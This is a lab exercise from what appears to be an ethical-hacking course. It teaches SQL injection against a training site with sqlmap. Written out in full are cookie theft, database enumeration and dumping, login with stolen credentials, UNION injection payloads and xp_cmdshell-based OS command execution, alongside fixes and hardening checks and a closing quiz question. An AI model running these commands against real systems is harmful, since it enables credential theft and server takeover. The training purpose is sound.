Exercise 4: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap

SQL injection is a technique used to take advantage of unsanitized input vulnerabilities to
pass SQL commands through a web application for execution by a backend database.

Lab Scenario

In SQL injection attacks, the attacker injects malicious SQL syntax into a user-controlled input
(a form field, a URL parameter, a cookie) either to gain unauthorized access to a database or to
retrieve information directly from it. Such attacks are possible because the web application
concatenates untrusted input into an SQL statement instead of validating and parameterizing it;
the database and the web server are behaving as designed.

A security professional must have the required knowledge to perform an SQL injection attack
on the organization's website to check its security infrastructure.

Lab Objectives

This lab demonstrates how to perform an SQL injection attack using sqlmap.

Overview of SQL Injection

SQL injection attacks use a series of malicious SQL queries or SQL statements to manipulate
the database directly. Applications often use SQL statements to authenticate users, validate
roles and access levels, store and obtain information for the application and user, and link to
other data sources. SQL injection attacks work when an application does not properly
validate an input before passing it to an SQL statement.
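The following T-SQL is an added illustration, not code from the lab or from the MovieScope application. It shows the query shape the lab's viewprofile.aspx?id=1 page presumably runs, what that query becomes when the id value is concatenated into it, and a parameterized form that cannot be injected. The Profile table and its columns are hypothetical; the moviescope database, the User_Login table and its Uname and password columns are the names the lab's later steps reveal.

```sql
-- Assumed intended query for viewprofile.aspx?id=1 (Profile table is hypothetical)
SELECT Uname, Email FROM Profile WHERE id = 1;

-- If the page builds that statement by string concatenation, a request such as
--   viewprofile.aspx?id=1 UNION SELECT Uname, password FROM User_Login--
-- makes the server execute the following. The trailing -- comments out whatever
-- the application appends, and the UNION must match the first SELECT's column
-- count and types (sqlmap probes for that count automatically).
SELECT Uname, Email FROM Profile WHERE id = 1 UNION SELECT Uname, password FROM User_Login--;

-- Boolean-based probe of the kind sqlmap sends while confirming injectability:
-- id=1 AND 1=1 returns the profile, id=1 AND 1=2 returns an empty page.
SELECT Uname, Email FROM Profile WHERE id = 1 AND 1=2;

-- Non-injectable form: the value travels as a typed parameter, never as SQL text.
-- (Shown as T-SQL dynamic SQL; an ASP.NET page achieves the same with SqlParameter.)
DECLARE @id INT = 1;
EXEC sp_executesql
    N'SELECT Uname, Email FROM Profile WHERE id = @id',
    N'@id INT',
    @id = @id;
```

Every payload sqlmap tries in the steps below is a variation on the second and third statements; the last statement is what closes the hole.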

Lab Tasks

In this lab, you will pretend that you are a registered user on the http://www.moviescope.com
website and wish to extract the credentials of other users from the website's database.

If you are already logged into the Attacker Machine-2, then skip to Step#3.

1. Click Attacker Machine-2 to switch to the Attacker Machine-2 machine.


2. In the login page, the attacker username will be selected by default. Enter password
as toor in the Password field and press Enter to log in to the machine.

If a Question pop-up window appears asking you to update the machine, click
No to close the window.
3. Click the Mozilla Firefox icon from the menu bar in the top-left corner of Desktop to
launch the web browser.
4. Type http://www.moviescope.com/ and press Enter. A Login page loads; enter the
Username and Password as sam and test, respectively. Click the Login button.

If a Would you like Firefox to save this login for moviescope.com?
notification appears at the top of the browser window, click Don't Save.
5. After logging into the website, click the View Profile tab on the menu bar and, when
the page has loaded, note the URL in the address bar of the browser.
6. Right-click anywhere on the webpage and click Inspect Element (Q) from the
context menu, as shown in the screenshot below.
7. The Developer Tools frame appears in the lower section of the browser window.
Click the Console tab, type document.cookie in the lower-left corner of the browser,
and press Enter.
8. Select the cookie value, then right-click and copy it, as shown in the screenshot
below. Minimize the web browser.
9. Click the MATE Terminal icon at the top of the Desktop window to open a Parrot
Terminal window.
10. A Parrot Terminal window appears. In the terminal window, type sudo su and press
Enter to run the programs as a root user.
11. In the [sudo] password for attacker field, type toor as a password and press Enter.

The password that you type will not be visible.

12. Now, type cd and press Enter to jump to the root directory.
13. In the Parrot Terminal window, type sqlmap -u
"http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value
that you copied in Step 8]" --dbs and press Enter.

In this command, -u specifies the target URL (the one noted down in Step 5),
--cookie supplies the HTTP Cookie header value so that requests are made inside
sam's authenticated session, and --dbs enumerates the DBMS databases.

14. The above command causes sqlmap to apply various injection techniques to the id
parameter of the URL in an attempt to extract the database information of the
MovieScope website.
15. If the message Do you want to skip test payloads specific for other DBMSes?
[Y/n] appears, type Y and press Enter.
16. If the message for the remaining tests, do you want to include all tests for
‘Microsoft SQL Server’ extending provided level (1) and risk (1) values? [Y/n]
appears, type Y and press Enter.
17. Similarly, if any other message appears, type Y and press Enter to continue.
18. sqlmap retrieves the databases present in the MSSQL server. It also displays
information about the web server OS, web application technology, and the backend
DBMS, as shown in the screenshot below.
19. Now, we will choose a database and use sqlmap to retrieve the tables in the database.
In this lab, we will determine the tables associated with the database moviescope.
20. Type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1"
--cookie="[cookie value which you have copied in Step 8]" -D moviescope --tables
and press Enter.

In this command, -D specifies the DBMS database to enumerate and --tables
enumerates that database's tables.

21. The above command causes sqlmap to enumerate the tables of the moviescope database.
22. sqlmap retrieves and displays the list of tables in the moviescope database, as shown in
the screenshot below.
23. Now, we will retrieve the content of the column User_Login.
24. Type sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1"
--cookie="[cookie value which you have copied in Step 8]" -D moviescope -T
User_Login --dump and press Enter to dump the entire content of the User_Login table.
25. sqlmap retrieves the complete User_Login table data from the database moviescope,
containing all users’ usernames under the Uname column and passwords under the
password column, as shown in screenshot below.
26. Under the password column, the passwords are stored and shown in plain text. That is a
second finding worth reporting alongside the injection itself: a site that hashed its
passwords would not hand usable credentials to an attacker who dumped this table.
27. To verify whether the login details are valid, attempt to log in with the extracted login
details of any of the users. To do so, switch back to the web browser, close the
Developer Tools console, and click Logout to start a new session on the site.
28. The Login page appears. Log in into the website using the retrieved credentials
john/qwerty.

If a Would you like Firefox to save this login for moviescope.com?
notification appears at the top of the browser window, click Don't Save.
29. You will be successfully logged into the MovieScope website with john account, as
shown in the screenshot below.
30. Now, switch back to the Parrot Terminal window. Type sqlmap -u
"http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value
which you have copied in Step 8]" --os-shell and press Enter.

In this command, --os-shell asks sqlmap for an interactive operating-system shell on
the database server. On Microsoft SQL Server it obtains this through the xp_cmdshell
extended stored procedure, so it only succeeds if the login the application uses has
the rights to run (or re-enable) that procedure.


31. If the message do you want sqlmap to try to optimize value(s) for DBMS delay
responses appears, type Y and press Enter to continue.
32. Once sqlmap has established command execution on the target, it presents the os-shell
prompt. Type hostname and press Enter to find the name of the machine where the site is
running.
33. If the message do you want to retrieve the command standard output? appears,
type Y and press Enter.
34. sqlmap will retrieve the hostname of the machine on which the target web application
is running, as shown in the screenshot below.
35. Type TASKLIST and press Enter to view the list of tasks currently running on the
target system.

If the message do you want to retrieve the command standard output?
appears, type Y and press Enter.
36. The above command retrieves the tasks and displays them under the command
standard output section, as shown in the screenshots below.
37. Following the same process, various other commands can be used to obtain further
detailed information about the target machine.

To view the available commands under the OS shell, type help and press
Enter.

38. This concludes the demonstration of launching a SQL injection attack against
MSSQL to extract databases using sqlmap.
39. Close all open windows and document all the acquired information.
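As an added reference (not part of the lab), the T-SQL below is what the sqlmap options used above correspond to on Microsoft SQL Server. It lets you reproduce or verify the output of Steps 18, 22, 25 and 32 directly if you have a database login, and it includes the check a defender runs to see whether the os-shell step is even possible. Only names taken from the lab are used (moviescope, User_Login, Uname, password).

```sql
-- --dbs: enumerate databases. sqlmap reads the master catalog; sys.databases is the
-- modern equivalent of the legacy master..sysdatabases view.
SELECT name FROM sys.databases;

-- -D moviescope --tables
SELECT TABLE_SCHEMA, TABLE_NAME
FROM moviescope.INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE';

-- -D moviescope -T User_Login --dump: sqlmap first lists the columns, then pulls the rows
SELECT COLUMN_NAME, DATA_TYPE
FROM moviescope.INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = 'User_Login';
SELECT Uname, password FROM moviescope..User_Login;

-- --os-shell: on MSSQL this rides on xp_cmdshell, which is disabled by default.
-- When the injected login is sysadmin, sqlmap re-enables it with sp_configure
-- and then runs each command you type (hostname, tasklist, ...) like this:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;            RECONFIGURE;
EXEC master..xp_cmdshell 'hostname';
EXEC master..xp_cmdshell 'tasklist';

-- Defender's checks: is xp_cmdshell on, and does the application's login hold sysadmin?
SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
SELECT IS_SRVROLEMEMBER('sysadmin');   -- 1 means Step 30 would succeed against this login

-- Hardening after the exercise: switch it back off and run the site under a
-- low-privilege login that owns nothing outside the moviescope database.
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
```

The enumeration queries need nothing beyond the ability to read the catalog, which is why --dbs and --dump work with an ordinary application login; the xp_cmdshell sequence is what turns a data leak into host compromise, and it is gated entirely by the privileges of the account the web application connects with.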

Question 2.4.1

In the Attacker Machine-2 machine, perform an SQL injection attack using the sqlmap tool
on the target website www.moviescope.com. Enumerate the DBMS databases and tables
associated with the target website. Dump the table content of the User_Login table and
identify the password associated with the username steve.
